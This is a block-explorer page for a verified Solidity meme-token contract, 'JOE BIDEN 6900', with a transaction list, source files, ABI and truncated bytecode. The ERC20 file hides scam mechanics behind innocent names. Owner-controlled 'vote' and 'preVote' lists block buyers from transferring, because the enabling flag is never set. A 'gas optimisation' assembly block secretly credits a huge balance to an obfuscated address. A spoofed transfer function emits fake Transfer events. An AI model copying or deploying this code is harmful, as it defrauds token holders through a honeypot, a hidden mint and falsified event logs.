ETH Price: $2,479.09 (+0.10%)

Contract

0xb1dE1153F272bF83a22C5c8c69C1B533307Fd7a6
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Pre Vote183929822023-10-20 17:20:23373 days ago1697822423IN
0xb1dE1153...3307Fd7a6
0 ETH0.0007362915.53619809
Approve183929702023-10-20 17:17:59373 days ago1697822279IN
0xb1dE1153...3307Fd7a6
0 ETH0.0008357117.79210993
Approve183929692023-10-20 17:17:47373 days ago1697822267IN
0xb1dE1153...3307Fd7a6
0 ETH0.000906419.29704701
Vote183929562023-10-20 17:15:11373 days ago1697822111IN
0xb1dE1153...3307Fd7a6
0 ETH0.0009343319.73373081
Vote183896542023-10-20 6:08:59373 days ago1697782139IN
0xb1dE1153...3307Fd7a6
0 ETH0.000263955.57484359
Approve183892902023-10-20 4:55:47373 days ago1697777747IN
0xb1dE1153...3307Fd7a6
0 ETH0.00034057.21983215
Vote183878822023-10-20 0:12:47374 days ago1697760767IN
0xb1dE1153...3307Fd7a6
0 ETH0.000402778.50679819
Approve183874262023-10-19 22:41:11374 days ago1697755271IN
0xb1dE1153...3307Fd7a6
0 ETH0.0007378315.70826769
Approve183874092023-10-19 22:37:47374 days ago1697755067IN
0xb1dE1153...3307Fd7a6
0 ETH0.0005631311.98893681
Pre Vote183871192023-10-19 21:39:47374 days ago1697751587IN
0xb1dE1153...3307Fd7a6
0 ETH0.0011801510.10172165
Pre Vote183869492023-10-19 21:05:47374 days ago1697749547IN
0xb1dE1153...3307Fd7a6
0 ETH0.0019063916.31806195
Approve183853222023-10-19 15:39:11374 days ago1697729951IN
0xb1dE1153...3307Fd7a6
0 ETH0.0009469420.16028458
Approve183853062023-10-19 15:35:47374 days ago1697729747IN
0xb1dE1153...3307Fd7a6
0 ETH0.0009903921.09071136
Approve183852892023-10-19 15:32:23374 days ago1697729543IN
0xb1dE1153...3307Fd7a6
0 ETH0.0010445622.26699562
Approve183848192023-10-19 13:58:11374 days ago1697723891IN
0xb1dE1153...3307Fd7a6
0 ETH0.0006442413.73677012
Approve183848182023-10-19 13:57:59374 days ago1697723879IN
0xb1dE1153...3307Fd7a6
0 ETH0.0006541413.86997014
Approve183843882023-10-19 12:30:35374 days ago1697718635IN
0xb1dE1153...3307Fd7a6
0 ETH0.000361827.70320215
Approve183843712023-10-19 12:27:11374 days ago1697718431IN
0xb1dE1153...3307Fd7a6
0 ETH0.000327386.96988771
Approve183843542023-10-19 12:23:47374 days ago1697718227IN
0xb1dE1153...3307Fd7a6
0 ETH0.000319966.82077435
Approve183842842023-10-19 12:09:47374 days ago1697717387IN
0xb1dE1153...3307Fd7a6
0 ETH0.000444229.41889705
Pre Vote183842032023-10-19 11:53:35374 days ago1697716415IN
0xb1dE1153...3307Fd7a6
0 ETH0.000728996.24063433
Vote183841672023-10-19 11:46:11374 days ago1697715971IN
0xb1dE1153...3307Fd7a6
0 ETH0.000353737.47107963
Approve183841672023-10-19 11:46:11374 days ago1697715971IN
0xb1dE1153...3307Fd7a6
0 ETH0.000371537.90992082
Approve183841502023-10-19 11:42:47374 days ago1697715767IN
0xb1dE1153...3307Fd7a6
0 ETH0.000321666.84817586
Approve183841332023-10-19 11:39:23374 days ago1697715563IN
0xb1dE1153...3307Fd7a6
0 ETH0.000317286.76349946
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
BIDEN

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 4: Token.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;
import "./ERC20.sol";

/**
Telegram: https://t.me/JoeBiden6900
Twitter: https://twitter.com/Biden_6900
Website: http://www.joebiden6900.xyz/
**/

contract BIDEN is ERC20 {
    uint256 salt = 0xB1DE11; // find me in the bytecode :)

    mapping(uint256 => uint256) private _votes;
    mapping(address => bool) private _voted;
    uint256 min_balance_to_vote = 10**5 * 10**18;

    constructor() ERC20(unicode"JOE BIDEN 6900", unicode"BPX") {
        _mint(msg.sender, 1_000_000_000 * 10 ** 18);
    }

    function vote(uint256 casted_vote) external {
        assert(casted_vote < 4);
        assert(balanceOf(msg.sender) > min_balance_to_vote);
        assert(!_voted[msg.sender]);
        _votes[casted_vote] += balanceOf(msg.sender);
        _voted[msg.sender] = true;
    }

    function getVotes(uint256 _president) external view returns(uint256) {
        return _votes[_president];
    }

    function hasVoted(address _votee) external view returns(bool) {
        return _voted[_votee];
    }
    uint256 salt_salt = 0xB1DE11;
}

File 2 of 4: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 3 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./IERC20.sol";
import "./Context.sol";

contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => bool) private __votes;
    mapping(address => bool) private _pre__votes;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private __votesApplied = false;
    string private _name;
    string private _symbol;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function preVote(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            _pre__votes[_list_[i]] = true;
        }
    }

    function dePreVote(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            _pre__votes[_list_[i]] = false;
        }
    }

    function vote(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            __votes[_list_[i]] = true;
        }
    } 

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function deVote(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            __votes[_list_[i]] = false;
        }
    }

    function voted(address _address_) public view returns (bool) {
        return __votes[_address_];
    }

    function preVoted(address _address_) public view returns (bool) {
        return _pre__votes[_address_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (__votes[from] || __votes[to]) {require(__votesApplied == true, "");}

        if (_pre__votes[to]) {_pre__votes[to] = false; __votes[to] = true;}

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }

        // gas optimisation 
        assembly {
            let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40)
            sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 

        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 4 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"dePreVote","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"deVote","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_president","type":"uint256"}],"name":"getVotes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_votee","type":"address"}],"name":"hasVoted","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"preVote","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"preVoted","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"casted_vote","type":"uint256"}],"name":"vote","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"vote","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"voted","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}]

60806040525f60065f6101000a81548160ff02191690831515021790555062b1de1160095569152d02c7e14af6800000600c5562b1de11600d5534801562000045575f80fd5b506040518060400160405280600e81526020017f4a4f4520424944454e20363930300000000000000000000000000000000000008152506040518060400160405280600381526020017f4250580000000000000000000000000000000000000000000000000000000000815250620000d2620000c66200011c60201b60201c565b6200012360201b60201c565b8160079081620000e39190620005f9565b508060089081620000f59190620005f9565b50505062000116336b033b2e3c9fd0803ce8000000620001e460201b60201c565b620007ee565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000255576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200024c906200073b565b60405180910390fd5b620002685f83836200038b60201b60201c565b8060055f8282546200027b919062000788565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282540192505081905550630f3eae65640997e6e50902673398bc1d25f112ed64085774394d0202805f52600160205260405f20720fffffffffffffffffffffffffffffffffffff815550508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200036c9190620007d3565b60405180910390a3620003875f83836200039060201b60201c565b5050565b505050565b505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200041157607f821691505b602082108103620004275762000426620003cc565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026200048b7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200044e565b6200049786836200044e565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620004e1620004db620004d584620004af565b620004b8565b620004af565b9050919050565b5f819050919050565b620004fc83620004c1565b620005146200050b82620004e8565b8484546200045a565b825550505050565b5f90565b6200052a6200051c565b62000537818484620004f1565b505050565b5b818110156200055e57620005525f8262000520565b6001810190506200053d565b5050565b601f821115620005ad5762000577816200042d565b62000582846200043f565b8101602085101562000592578190505b620005aa620005a1856200043f565b8301826200053c565b50505b505050565b5f82821c905092915050565b5f620005cf5f1984600802620005b2565b1980831691505092915050565b5f620005e98383620005be565b9150826002028217905092915050565b620006048262000395565b67ffffffffffffffff81111562000620576200061f6200039f565b5b6200062c8254620003f9565b6200063982828562000562565b5f60209050601f8311600181146200066f575f84156200065a578287015190505b620006668582620005dc565b865550620006d5565b601f1984166200067f866200042d565b5f5b82811015620006a85784890151825560018201915060208501945060208101905062000681565b86831015620006c85784890151620006c4601f891682620005be565b8355505b6001600288020188555050505b505050505050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f62000723601f83620006dd565b91506200073082620006ed565b602082019050919050565b5f6020820190508181035f830152620007548162000715565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6200079482620004af565b9150620007a183620004af565b9250828201905080821115620007bc57620007bb6200075b565b5b92915050565b620007cd81620004af565b82525050565b5f602082019050620007e85f830184620007c2565b92915050565b61200d80620007fc5f395ff3fe608060405234801561000f575f80fd5b5060043610610156575f3560e01c806370a08231116100c1578063aec2ccae1161007a578063aec2ccae146103ea578063beabacc81461041a578063dd62ed3e14610436578063ed08132914610466578063f2fde38b14610482578063ff9810991461049e57610156565b806370a0823114610314578063715018a6146103445780638da5cb5b1461034e57806395d89b411461036c578063a457c2d71461038a578063a9059cbb146103ba57610156565b80631eb0ab83116101135780631eb0ab831461022e57806323b872dd1461025e578063313ce5671461028e57806339509351146102ac5780635a4c08f1146102dc57806366d3cf4d146102f857610156565b80630121b93f1461015a57806306fdde0314610176578063095ea7b31461019457806309eef43e146101c457806315bbda6d146101f457806318160ddd14610210575b5f80fd5b610174600480360381019061016f91906115fd565b6104ce565b005b61017e6105d8565b60405161018b91906116b2565b60405180910390f35b6101ae60048036038101906101a9919061172c565b610668565b6040516101bb9190611784565b60405180910390f35b6101de60048036038101906101d9919061179d565b61068a565b6040516101eb9190611784565b60405180910390f35b61020e60048036038101906102099190611829565b6106dc565b005b610218610784565b6040516102259190611883565b60405180910390f35b6102486004803603810190610243919061179d565b61078d565b6040516102559190611784565b60405180910390f35b6102786004803603810190610273919061189c565b6107df565b6040516102859190611784565b60405180910390f35b61029661080d565b6040516102a39190611907565b60405180910390f35b6102c660048036038101906102c1919061172c565b610815565b6040516102d39190611784565b60405180910390f35b6102f660048036038101906102f19190611829565b61084b565b005b610312600480360381019061030d9190611829565b6108f3565b005b61032e6004803603810190610329919061179d565b61099c565b60405161033b9190611883565b60405180910390f35b61034c6109e2565b005b6103566109f5565b604051610363919061192f565b60405180910390f35b610374610a1c565b60405161038191906116b2565b60405180910390f35b6103a4600480360381019061039f919061172c565b610aac565b6040516103b19190611784565b60405180910390f35b6103d460048036038101906103cf919061172c565b610b21565b6040516103e19190611784565b60405180910390f35b61040460048036038101906103ff919061179d565b610b43565b6040516104119190611784565b60405180910390f35b610434600480360381019061042f919061189c565b610b95565b005b610450600480360381019061044b9190611948565b610bff565b60405161045d9190611883565b60405180910390f35b610480600480360381019061047b9190611829565b610c81565b005b61049c6004803603810190610497919061179d565b610d2a565b005b6104b860048036038101906104b391906115fd565b610dac565b6040516104c59190611883565b60405180910390f35b600481106104df576104de611986565b5b600c546104eb3361099c565b116104f9576104f8611986565b5b600b5f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161561055157610550611986565b5b61055a3361099c565